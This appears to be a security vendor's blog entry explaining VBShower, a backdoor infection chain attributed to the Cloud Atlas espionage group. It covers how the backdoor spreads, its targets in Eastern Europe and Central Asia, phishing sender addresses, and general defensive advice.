Do you know what VBShower is?
VBShower refers to a series of phishing attacks that are closely related to Cloud Atlas. Cloud Atlas is associated with a number of espionage attacks against various countries in several regions. It is common for malicious agents to change over time, so VBShower happens to be the newest infection chain that is used by Cloud Atlas to attack their targets and steal important information. In this entry, we will tell you more about the malicious campaign, but we will omit the obligatory manual removal guide because this infection chain is far too sophisticated for it. If your system has been attacked by this malware, it is for the best to leave it to the professionals.
Security researchers suggest that VBShower is a “polymorphic” infection chain. This infection relies on a polymorphic HTA or HTML Application that is hosted on a remote server. What is an HTA? To put it simply, it is a program with a code that consists of HTML or any other scripting language that is supported by Internet Explorer. Languages that are supported by Internet Explorer might be VBScript or Jscript. Due to its nature, an HTA can be executed as a “fully trusted” application. Thus, it is not surprising that it can be used by cybercrime actors to promote and distribute malware.
As mentioned, to enter the target system, VBShower executes a remote HTA, and then it uses the application to drop three files on the affected system. VBShower itself functions as a backdoor, and it is launched by a tiny launcher that is dropped like one of those three files. The final file that is dropped on the target system is computed by the HTA. This file is there to log such data as the computer name, domain, the current user, and current active processes.
Since Cloud Atlas is the most prominent in Eastern Europe and Central Asia, we can expect VBShower to be found in a number of computer systems in these regions, too. According to the most recent research, the countries that are targeted by Cloud Atlas (and consequently VBShower) in 2019 include Russia, Kyrgyzstan, Turkmenistan, Afghanistan, Ukraine, Romania, Turkey, and (surprisingly) Portugal. It goes without saying that such actors usually do not care about individual users. Rather than infecting personal computers, VBShower and Cloud Atlas go for government entities, religious organizations, economic entities, international organizations, and aerospace industries.
With the scope of this infection, we can clearly see that regular users probably do not even know about VBShower, and there is nothing much one could do if their system was infected with this backdoor. For the most part, it is often impossible to tell that you got infected with a backdoor because they remain hidden for quite a while. For agencies and government institutions, it is vital to invest in cybersecurity and run regular system scans with licensed antispyware tools because that is the best way to detect malware as soon as possible. Before it manages to steal vital information.
Also, it is necessary to educate all the employees about potential security threats and malware distribution tactics. Since VBShower comes with phishing attacks, we have to learn how to recognize phishing emails and delete them without interacting with their content. For the most part, phishing emails get filtered into the Junk folder, no questions asked. But if it falls into your main inbox, you need to think before opening the attached file or before clicking an outgoing link. Especially if you do not recognize the sender.
Here’s a list of emails that are used by the attackers to distribute VBShower around:
infocentre.gov@bk.ru
infocentre.gov@mail.ru
middleeasteye@asia.com
simbf2019@mail.ru
world_overview@politician.com
It is not a full list, and there might always be new emails out there. As you can see, they don’t look suspicious for the most part, and there is a chance that a legitimate email account gets hacked and starts sending out phishing messages. The point is that we have to be careful whenever we are about to open attached files on a corporate computer because you can never know who could target your network.
As mentioned, to remove VBShower, it is necessary to address a professional. If you have an IT department in your organization, they have to fix this issue. Your job is to make sure that all of your data is backed up, and you do not get infected with something that dangerous again.
In non-techie terms:
VBShower is a backdoor infection that belongs to a notorious family of malware actors that target government organizations in Central Asia and Eastern Europe. You might not encounter this infection first-hand, but it poses serious threats to multiple organizations. It means that institutions need to step up their cybersecurity game; investing in legitimate antispyware programs and hiring professionals who can help you deflect these attacks.